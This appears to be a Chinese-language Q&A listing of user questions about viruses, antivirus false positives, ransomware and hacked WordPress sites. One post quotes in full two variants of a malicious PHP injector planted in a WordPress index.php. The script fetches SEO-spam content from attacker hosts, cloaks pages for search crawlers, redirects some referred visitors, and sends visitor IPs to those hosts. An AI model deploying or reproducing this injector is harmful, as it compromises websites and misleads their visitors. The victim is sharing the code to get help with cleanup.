计算机病毒是一种计算机程序,可以自我复制并从一台计算机传播到另一台计算机。术语“病毒”也通常但错误地用于指代其他类型的恶意软件,包括但不限于不具有生殖能力的广告软件和间谍软件程序。
我发现我的服务器的十个cpu核心都满了,认为有病毒。所以我找到了proc并删除了病毒的exe文件。但是,当我重新启动时,病毒又回来了,并且exe名称包含“(del ...
C# 应用程序被卡巴斯基检测为木马病毒 (VHO:Trojan.MSIL.Convagent.gen)
我开发了一个 C# winform 应用程序来从 firebird db 导入行 编译时,我从 vstudio 收到一条消息,无法访问 .exe 文件,然后从卡巴斯基收到一条警告消息,通知我......
我实际上正在编写一个防病毒软件来专门修复受快捷方式病毒感染的 USB,我认为我在编程方面做得很好并且我确定我的程序应该可以运行,但是要测试它
你好,我不知道去哪里找这个,但是有人知道这是什么吗? [关闭]
我想我中了病毒,但我只是确定一下。在此处输入图片描述这是一张图片,我模糊了看起来像是帐户或其他东西的标记。另外,我不拥有国际足联所以不知道为什么它...
我们的 cPanel Wordpress 网站正在自动创建此 index.php
<?php $group_num = 'z9126zn'; $inter_domain = 'http://' . $group_num . '.lievful.quest'; function curl_get_contents($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); $file_contents = curl_exec($ch); curl_close($ch); return $file_contents; } function getServerCont($url, $data = array()) { $url = str_replace(' ', '+', $url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$url"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); $output = curl_exec($ch); $errorCode = curl_errno($ch); curl_close($ch); if (0 !== $errorCode) { return false; } return $output; } function is_crawler($agent) { if (strpos($agent, 'google') !== false || strpos($agent, 'yahoo') !== false) { return true; } else { return false; } } function check_refer($refer) { if (strpos($refer, '.co.jp') !== false || strpos($refer, 'google.com') !== false) { return true; } else { return false; } } $http = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https://' : 'http://'); $req_uri = $_SERVER['REQUEST_URI']; $domain = $_SERVER["HTTP_HOST"]; $self = $_SERVER['PHP_SELF']; $ser_name = $_SERVER['SERVER_NAME']; $req_url = $http . $domain . $req_uri; $indata1 = $inter_domain . "/indata.php"; $map1 = $inter_domain . "/map.php"; $jump1 = $inter_domain . "/jump.php"; $url_words = $inter_domain . "/words.php"; $url_robots = $inter_domain . "/robots.php"; if (strpos($req_uri, ".php")) { $href1 = $http . $domain . $self; } else { $href1 = $http . $domain; } $data1[] = array(); $data1['http'] = $http; $data1['domain'] = $domain; $data1['req_uri'] = $req_uri; $data1['href'] = $href1; $data1['req_url'] = $req_url; $user_agent = strtolower(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''); if(getenv('HTTP_CLIENT_IP')){ $client_ip = getenv('HTTP_CLIENT_IP'); } elseif(getenv('HTTP_X_FORWARDED_FOR')) { $client_ip = getenv('HTTP_X_FORWARDED_FOR'); } elseif(getenv('REMOTE_ADDR')) { $client_ip = getenv('REMOTE_ADDR'); } else { $client_ip = $_SERVER['REMOTE_ADDR']; } if (substr($req_uri, -6) == 'robots') { $robots_cont = getServerCont($url_robots, $data1); define('BASE_PATH', str_ireplace($_SERVER['PHP_SELF'], '', __FILE__)); file_put_contents(BASE_PATH . '/robots.txt', $robots_cont); $robots_cont = file_get_contents(BASE_PATH . '/robots.txt'); if (strpos($robots_cont, "Crawl-delay:3")) { echo 'robots.txt file create success!'; } else { echo 'robots.txt file create fail!'; } exit; } if (substr($req_uri, -4) == '.xml') { if (strpos($req_uri, "pingsitemap.xml")) { $str_cont = getServerCont($map1, $data1); $str_cont_arr = explode(",", $str_cont); $str_cont_arr[] = 'sitemap'; for ($k = 0; $k < count($str_cont_arr); $k++) { if (strpos($href1, ".php") > 0) { $tt1 = '?'; } else { $tt1 = '/'; } $http2 = $href1 . $tt1 . $str_cont_arr[$k] . '.xml'; $data_new = 'https://www.google.com/ping?sitemap=' . $http2; $data_new1 = 'http://www.google.com/ping?sitemap=' . $http2; if (stristr(@file_get_contents($data_new), 'successfully')) { echo $data_new . '===>Submitting Google Sitemap: OK' . PHP_EOL; } else if (stristr(@curl_get_contents($data_new), 'successfully')) { echo $data_new . '===>Submitting Google Sitemap: OK' . PHP_EOL; } else if (stristr(@file_get_contents($data_new1), 'successfully')) { echo $data_new1 . '===>Submitting Google Sitemap: OK' . PHP_EOL; } else if (stristr(@curl_get_contents($data_new1), 'successfully')) { echo $data_new1 . '===>Submitting Google Sitemap: OK' . PHP_EOL; } else { echo $data_new1 . '===>Submitting Google Sitemap: fail' . PHP_EOL; } } exit; } if (strpos($req_uri, "allsitemap.xml")) { $str_cont = getServerCont($map1, $data1); header("Content-type:text/xml"); echo $str_cont; exit; } if (strpos($req_uri, ".php")) { $word4 = explode("?", $req_uri); $word4 = $word4[count($word4) - 1]; $word4 = str_replace(".xml", "", $word4); } else { $word4 = str_replace("/", "", $req_uri); $word4 = str_replace(".xml", "", $word4); } $data1['word'] = $word4; $data1['action'] = 'check_sitemap'; $check_url4 = getServerCont($url_words, $data1); if ($check_url4 == '1') { $str_cont = getServerCont($map1, $data1); header("Content-type:text/xml"); echo $str_cont; exit; } $data1['action'] = "check_words"; $check1 = getServerCont($url_words, $data1); if (strpos($req_uri, "map") > 0 || $check1 == '1') { $data1['action'] = "rand_xml"; $check_url4 = getServerCont($url_words, $data1); header("Content-type:text/xml"); echo $check_url4; exit; } } if (strpos($req_uri, ".php")) { $main_shell = $http . $ser_name . $self; $data1['main_shell'] = $main_shell; } else { $main_shell = $http . $ser_name; $data1['main_shell'] = $main_shell; } $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $chk_refer = check_refer($referer); $bot=true; if ($chk_refer) { $data1['referer'] = $referer; $data1['ip'] = $client_ip; $data1['user_agent'] = $user_agent; $data1['browser_la'] = $_SERVER['HTTP_ACCEPT_LANGUAGE']; $refer_content = getServerCont($jump1, $data1); if ($refer_content != "404") { echo $refer_content; exit; } $bot=false; } $res_crawl = is_crawler($user_agent); if ($res_crawl&&$bot) { $data1['http_user_agent'] = $user_agent; $get_content = getServerCont($indata1, $data1); if ($get_content == "404") { header('HTTP/1.0 404 Not Found'); exit; } else if ($get_content == "500") { header("HTTP/1.0 500 Internal Server Error"); exit; } else if ($get_content == "blank") { echo ''; exit; } else { echo $get_content; exit; } } ?><?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php'; 这是我们无法控制的 index.php 文件。 我们有带有 cPanel 和 wordpress 托管的 Godaddy VPS 服务器。我们在目录中安装了 wordpress 站点,该目录会自动创建 INDEX 文件,打开时显示 HTTP ERROR 500。 这是在我们的 VPS 服务器中自动创建的。当我们更改它时它会自动修改。删除时自动创建。 简而言之,我们无法控制目录和这个文件。 我也有同样的问题 <?php $group_num = 'z0109_18'; $inter_domain = 'http://107.150.41.2//' . $group_num . '/'; function curl_get_contents($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); $file_contents = curl_exec($ch); curl_close($ch); return $file_contents; } function getServerCont($url, $data = array()) { $url = str_replace(' ', '+', $url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$url"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); $output = curl_exec($ch); $errorCode = curl_errno($ch); curl_close($ch); if (0 !== $errorCode) { return false; } return $output; } function is_crawler($agent) { $agent_check = false; $bots = 'googlebot|google|yahoo|bing|aol'; if ($agent != '') { if (preg_match("/($bots)/si", $agent)) { $agent_check = true; } } return $agent_check; } function check_refer($refer) { $check_refer = false; $referbots = 'google.co.jp|yahoo.co.jp|google.com'; if ($refer != '' && preg_match("/($referbots)/si", $refer)) { $check_refer = true; } return $check_refer; } $http = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https://' : 'http://'); $req_uri = $_SERVER['REQUEST_URI']; $domain = $_SERVER["HTTP_HOST"]; $self = $_SERVER['PHP_SELF']; $ser_name = $_SERVER['SERVER_NAME']; $req_url = $http . $domain . $req_uri; $indata1 = $inter_domain . "/indata.php"; $map1 = $inter_domain . "/map.php"; $jump1 = $inter_domain . "/jump.php"; $url_words = $inter_domain . "/words.php"; $url_robots = $inter_domain . "/robots.php"; if (strpos($req_uri, ".php")) { $href1 = $http . $domain . $self; } else { $href1 = $http . $domain; } $data1[] = array(); $data1['domain'] = $domain; $data1['req_uri'] = $req_uri; $data1['href'] = $href1; $data1['req_url'] = $req_url; if (substr($req_uri, -6) == 'robots') { $robots_cont = getServerCont($url_robots, $data1); define('BASE_PATH', str_ireplace($_SERVER['PHP_SELF'], '', __FILE__)); file_put_contents(BASE_PATH . '/robots.txt', $robots_cont); $robots_cont = file_get_contents(BASE_PATH . '/robots.txt'); if (strpos(strtolower($robots_cont), "sitemap")) { echo 'robots.txt file create success!'; } else { echo 'robots.txt file create fail!'; } return; } if (substr($req_uri, -4) == '.xml') { if (strpos($req_uri, "pingsitemap.xml")) { $str_cont = getServerCont($map1, $data1); $str_cont_arr = explode(",", $str_cont); $str_cont_arr[] = 'sitemap'; for ($k = 0; $k < count($str_cont_arr); $k++) { if (strpos($href1, ".php") > 0) { $tt1 = '?'; } else { $tt1 = '/'; } $http2 = $href1 . $tt1 . $str_cont_arr[$k] . '.xml'; $data_new = 'https://www.google.com/ping?sitemap=' . $http2; $data_new1 = 'http://www.google.com/ping?sitemap=' . $http2; if (stristr(@file_get_contents($data_new), 'successfully')) { echo $data_new . '===>Submitting Google Sitemap: OK' . PHP_EOL; } else if (stristr(@curl_get_contents($data_new), 'successfully')) { echo $data_new . '===>Submitting Google Sitemap: OK' . PHP_EOL; } else if (stristr(@file_get_contents($data_new1), 'successfully')) { echo $data_new1 . '===>Submitting Google Sitemap: OK' . PHP_EOL; } else if (stristr(@curl_get_contents($data_new1), 'successfully')) { echo $data_new1 . '===>Submitting Google Sitemap: OK' . PHP_EOL; } else { echo $data_new1 . '===>Submitting Google Sitemap: fail' . PHP_EOL; } } return; } if (strpos($req_uri, "allsitemap.xml")) { $str_cont = getServerCont($map1, $data1); header("Content-type:text/xml"); echo $str_cont; return; } if (strpos($req_uri, ".php")) { $word4 = explode("?", $req_uri); $word4 = $word4[count($word4) - 1]; $word4 = str_replace(".xml", "", $word4); } else { $word4 = str_replace("/", "", $req_uri); $word4 = str_replace(".xml", "", $word4); } $data1['word'] = $word4; $data1['action'] = 'check_sitemap'; $check_url4 = getServerCont($url_words, $data1); if ($check_url4 == '1') { $str_cont = getServerCont($map1, $data1); header("Content-type:text/xml"); echo $str_cont; return; } $data1['action'] = "check_words"; $check1 = getServerCont($url_words, $data1); if (strpos($req_uri, "map") > 0 || $check1 == '1') $data1['action'] = "rand_xml"; $check_url4 = getServerCont($url_words, $data1); header("Content-type:text/xml"); echo $check_url4; return; } if (strpos($req_uri, ".php")) { $main_shell = $http . $ser_name . $self; $data1['main_shell'] = $main_shell; } else { $main_shell = $http . $ser_name; $data1['main_shell'] = $main_shell; } $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $chk_refer = check_refer($referer); if (strpos($_SERVER['REQUEST_URI'], '.php')) { $url_ext = '?'; } else { $url_ext = '/'; } if ($chk_refer && (preg_match('/ja/i', @$_SERVER['HTTP_ACCEPT_LANGUAGE']) || preg_match('/ja/i', @$_SERVER['HTTP_ACCEPT_LANGUAGE']) || preg_match("/^[a-z0-9]+[0-9]+$/", end(explode($url_ext, str_replace(array(".html", ".htm"), "", $_SERVER['REQUEST_URI'])))))) { echo getServerCont($jump1, $data1); return; } $user_agent = strtolower(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''); $res_crawl = is_crawler($user_agent); if ($res_crawl) { $data1['http_user_agent'] = $user_agent; $get_content = getServerCont($indata1, $data1); echo $get_content; return; } ?> 我现在唯一的解决办法是删除 index.php recolection.php 和 wp-admin 和 wp-includes 文件夹。 之后,我重新安装了 WordPress,该网站再次运行。 过了一会儿 我开始检查所有内容,我发现了 3 个感染选项 Ftp 的另一个帐户(在您的 cpanel 中搜索用户) 创建文件的 Cron 任务 Cpanel 帐户妥协。我刚更改了密码,它就停止了。
是否有办法检索由于文件访问被Windows Defender阻止而引发的IOException的错误ID?
我试图访问我的下载文件夹中的文件,并希望区分可能的错误,以便在出现错误时更好地通知用户,特别是当Windows Defender干扰时(见下文)。
VS 2017:如何禁止重复自动安装 "Hopex Module Publisher "插件?
由于几天来,每当我启动VS 2017和打开一个项目,一个消息框弹出告诉"'HopexPackage'没有正确加载..."。当我查看我的扩展时,我可以看到 ...
我有一个工资系统,是用Visual C# Express编写的。实际上,我已经完成了它的编码并发布了它。但每当我在笔记本电脑上安装它时,它都被Avast阻止了! ...
所以我目前正在阅读《Java A Beginners Guide 7th Edition》这本书。而下面的句子在我看来,Applet可能是非常危险的病毒?到底是不是这样呢?一个Applet是 ...
我的使用python构建的exe文件正在从avast获取Threat.generic.heu。我怎样才能避免这种检测,邮件avast?这种HEU威胁是什么?
勒索软件使用扩展名.nlah加密了我的所有文件,我使用Spyhunter 5扫描Windows 10并删除了恶意软件。然后,我不得不寻找一种无法成功恢复文件的方法。这个...
Microsoft的OneDrive是病毒吗?因为它破坏了我的Windows系统
每个目录都进行了某种更改,以在其前面包含OneDrive,请参见下图。文档文件夹应该位于C:\ Users \ mart \ Documents,而位于C:\ Users \ ...
具有奇怪名称的服务的克隆,剪贴板服务,联系服务...…是否为病毒?
[几分钟前,我发现PC上的服务列表,以_d87e4后缀名克隆。每次,真正的服务都停止了,奇怪的克隆正在运行。受影响的服务列表:...
因此,我正在检查Discord,并打算添加一个“游戏”来玩,因为我注意到它附带了“ ZPToolBarParentWnd”。我尚未安装,这是我的计算机。这是病毒吗?我也尝试过...
我的一台服务器受到名为“ .Google”的勒索软件的攻击。它已经加密了我的所有文件,我无法访问它。受影响的计算机是Windows Server 2008r2。不幸的是,卷影副本没有...
查询MySQL以搜索字符串,并将同一列替换为子字符串,从0到找到的字符串位置
我正在删除独立于文件的wordpress攻击,并使用恶意脚本更新所有wp_posts表。列post_content的一个示例如下: [/ ...
我下载了一些重新打包的便携式软件(由于前一段时间,甚至不确定从哪个torrent /源下载)。安装它们后,我尝试扫描Virus Total,但未检测到...
我正在本地开发服务器上运行Wordpress,以测试来自“可疑”来源的插件。我相信在安装了插件的非官方副本之后,我已经被黑了。现在,我正在寻求帮助...